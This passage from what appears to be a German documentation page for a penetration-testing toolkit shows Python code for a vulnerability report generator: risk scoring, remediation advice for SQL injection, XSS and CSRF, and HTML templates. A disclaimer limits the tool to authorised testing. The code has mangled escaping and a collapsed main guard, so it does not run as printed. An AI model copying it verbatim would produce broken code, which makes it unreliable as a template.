raise ValueError("Unsupported output format")
def calculate_risk_score(self, high, medium, low):
"""Calculate overall risk score"""
score = (high * 10) + (medium * 5) + (low * 1)
if score >= 50:
return "Critical"
elif score >= 25:
return "High"
elif score >= 10:
return "Medium"
else:
return "Low"
def generate_vuln_recommendations(self):
"""Generate vulnerability-specific recommendations"""
recommendations = []
vuln_types = set(v.get('type', 'Unknown') for v in self.report_data.get('vulnerabilities', []))
recommendation_map = \\\\{
'SQL Injection': \\\\{
'title': 'SQL Injection Prevention',
'description': 'Implement parameterized queries and input validation',
'priority': 'High',
'effort': 'Medium'
\\\\},
'Cross-Site Scripting': \\\\{
'title': 'XSS Prevention',
'description': 'Implement output encoding and Content Security Policy',
'priority': 'High',
'effort': 'Medium'
\\\\},
'Cross-Site Request Forgery': \\\\{
'title': 'CSRF Protection',
'description': 'Implement CSRF tokens and SameSite cookies',
'priority': 'Medium',
'effort': 'Low'
\\\\}
\\\\}
for vuln_type in vuln_types:
if vuln_type in recommendation_map:
recommendations.append(recommendation_map[vuln_type])
return recommendations
def get_executive_template(self):
return """
<h3>Assessment Overview</h3>
<p>This security assessment was conducted on <strong>\\\\{\\\\{ target \\\\}\\\\}</strong> on \\\\{\\\\{ scan_date \\\\}\\\\}.</p>
<h4>Key Findings</h4>
<ul>
<li>Total Vulnerabilities Found: \\\\{\\\\{ total_vulnerabilities \\\\}\\\\}</li>
<li>High Risk: \\\\{\\\\{ high_risk_count \\\\}\\\\}</li>
<li>Medium Risk: \\\\{\\\\{ medium_risk_count \\\\}\\\\}</li>
<li>Low Risk: \\\\{\\\\{ low_risk_count \\\\}\\\\}</li>
<li>Overall Risk Score: \\\\{\\\\{ risk_score \\\\}\\\\}</li>
</ul>
"""
def get_technical_template(self):
return """
<h3>Vulnerability Details</h3>
\\\\{% for vuln in vulnerabilities %\\\\}
<div class="vulnerability \\\\{\\\\{ vuln.severity|lower \\\\}\\\\}-risk">
<h4>\\\\{\\\\{ vuln.name \\\\}\\\\}</h4>
<p><strong>Severity:</strong> \\\\{\\\\{ vuln.severity \\\\}\\\\}</p>
<p><strong>Description:</strong> \\\\{\\\\{ vuln.description \\\\}\\\\}</p>
<p><strong>Location:</strong> \\\\{\\\\{ vuln.url \\\\}\\\\}</p>
\\\\{% if vuln.proof_of_concept %\\\\}
<p><strong>Proof of Concept:</strong></p>
<pre>\\\\{\\\\{ vuln.proof_of_concept \\\\}\\\\}</pre>
\\\\{% endif %\\\\}
</div>
\\\\{% endfor %\\\\}
"""
def get_recommendations_template(self):
return """
<h3>Security Recommendations</h3>
\\\\{% for rec in recommendations %\\\\}
<div class="recommendation">
<h4>\\\\{\\\\{ rec.title \\\\}\\\\}</h4>
<p>\\\\{\\\\{ rec.description \\\\}\\\\}</p>
<p><strong>Priority:</strong> \\\\{\\\\{ rec.priority \\\\}\\\\}</p>
<p><strong>Implementation Effort:</strong> \\\\{\\\\{ rec.effort \\\\}\\\\}</p>
</div>
\\\\{% endfor %\\\\}
"""
Usage example¶
if name == "main": generator = PegasusReportGenerator() generator.load_scan_results('scan_results.json')
# Generate HTML report
html_report = generator.generate_full_report('html')
with open('security_assessment_report.html', 'w') as f:
f.write(html_report)
# Generate PDF report
pdf_report = generator.generate_full_report('pdf')
with open('security_assessment_report.pdf', 'wb') as f:
f.write(pdf_report)
```_
--
** Sicherheitshinweis**: Pegasus-Pentest-Arsenal ist ein umfassendes Penetrationstest-Toolkit, das nur für autorisierte Sicherheitstests verwendet werden sollte. Stellen Sie immer sicher, dass Sie eine ausdrückliche schriftliche Genehmigung haben, bevor Sie irgendwelche Systeme oder Anwendungen testen. Das Toolkit enthält leistungsfähige Ausbeutungsfunktionen, die bei Missbrauch Systemschäden oder Datenverluste verursachen könnten. Verwenden Sie dieses Tool verantwortungsvoll und entsprechend den geltenden Gesetzen, Vorschriften und ethischen Richtlinien. Immer im Rahmen autorisierter Penetrationstests arbeiten und verantwortungsvolle Offenlegungspraktiken für entdeckte Schwachstellen verfolgen.
📚 Zusätzliche Ressourcen: - Pegasus Arsenal GitHub Repository - (LINK_4_) - [NIST Cybersecurity Framework](LINK_4_ - [PTES Technische Leitlinien](LINK_4__